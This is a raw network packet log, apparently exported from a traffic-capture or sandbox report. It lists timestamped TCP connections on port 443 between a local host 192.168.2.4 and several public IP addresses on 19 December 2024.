                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.605752945 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.606369972 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.611815929 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.611835957 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.611892939 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.611901999 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.612318993 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.615339994 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.616406918 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.616436958 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.617816925 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.617835045 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.617888927 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.617899895 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.618521929 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.623634100 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.623651028 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.623713970 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.623723030 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.624332905 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.629703999 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.629724026 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.629781008 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.629790068 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.629832983 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.635113001 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.635129929 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.635194063 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.635202885 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.635893106 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.641294003 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.641309977 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.641370058 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.641381025 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.641949892 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.662266970 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.792381048 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.792401075 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.792583942 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.792612076 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.792659044 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.799540043 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.799581051 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.799691916 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.799705982 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.800388098 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.803679943 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.803740978 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.803782940 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.803792000 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.803829908 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.809853077 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.809916019 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.809942007 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.809953928 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.809971094 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.810568094 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815453053 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815479994 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815515995 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815526962 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815547943 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.815563917 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821712017 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821749926 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821783066 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821794987 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821831942 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.821861982 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827686071 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827714920 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827748060 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827760935 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827795982 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.827811956 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.833151102 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.833184958 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.833254099 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.833271980 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.833362103 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.984551907 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.984585047 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.984653950 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.984672070 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.984741926 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990683079 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990710020 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990756035 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990772009 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990794897 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.990812063 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995068073 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995134115 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995141029 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995176077 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995192051 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995197058 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995244026 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995554924 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.995572090 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.999612093 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.999664068 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:25.999798059 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.000000000 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.000014067 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.005131960 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.005335093 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.005395889 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.006180048 CET49759443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.006208897 CET4434975934.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.152594090 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.152669907 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.152746916 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.152947903 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.152961969 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.156877995 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.156939983 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157013893 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157218933 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157291889 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157424927 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157452106 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157469988 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157525063 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157798052 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.157812119 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.158355951 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.158371925 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.158480883 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.158497095 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.192204952 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.192262888 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.192456961 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.199420929 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.199456930 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.200232029 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.200313091 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.200381041 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.200759888 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.200777054 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.245760918 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.245835066 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.249886990 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.250214100 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.250226021 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.355670929 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.355735064 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.355808973 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.356093884 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.356107950 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.245965004 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.246041059 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.246114016 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.251621008 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.251892090 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.251923084 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.252393961 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.252711058 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.252806902 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.252846956 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.299349070 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.301821947 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.377126932 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.377561092 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.377598047 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.378115892 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.378529072 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.378607035 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.378607988 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.394052982 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.394506931 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.394547939 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.395492077 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.395658016 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.395941973 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.396013975 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.396085978 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.396100044 CET44349765104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.404454947 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.404762030 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.404800892 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.405834913 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.405913115 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.406230927 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.406292915 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.406356096 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.406363010 CET44349764104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.411489010 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.411739111 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.411760092 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.412524939 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.412811995 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.412868023 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.412930012 CET49763443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.423341990 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.426959038 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.442308903 CET49765443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.448055029 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.448611975 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.458071947 CET49764443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.459341049 CET44349763104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.471697092 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.471734047 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.471848965 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.471868992 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.472794056 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.472866058 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.472980022 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.475713015 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.475821018 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477065086 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477088928 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477552891 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477653980 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477679014 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.477973938 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478164911 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478419065 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478526115 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478566885 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478585958 CET44349767104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478703976 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478714943 CET44349766104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.478830099 CET49768443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.523344040 CET44349768104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.525470972 CET49766443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.528470039 CET49767443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.597367048 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.599276066 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.599298000 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.600764036 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.600923061 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.602818012 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.602951050 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.602993011 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.622387886 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.622435093 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.643342972 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.644766092 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.644779921 CET44349769104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.692982912 CET49769443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727699041 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727822065 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727864027 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727895021 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727902889 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727946043 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.727969885 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.728589058 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.728641033 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.728647947 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.743916988 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.743964911 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.743994951 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.744009972 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.744055986 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.752432108 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.800887108 CET49761443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.847539902 CET44349761104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.858753920 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.858958006 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859021902 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859049082 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859081030 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859127998 CET49762443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859174013 CET44349762104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:27.859349012 CET44349762104.16.102.112192.168.2.4
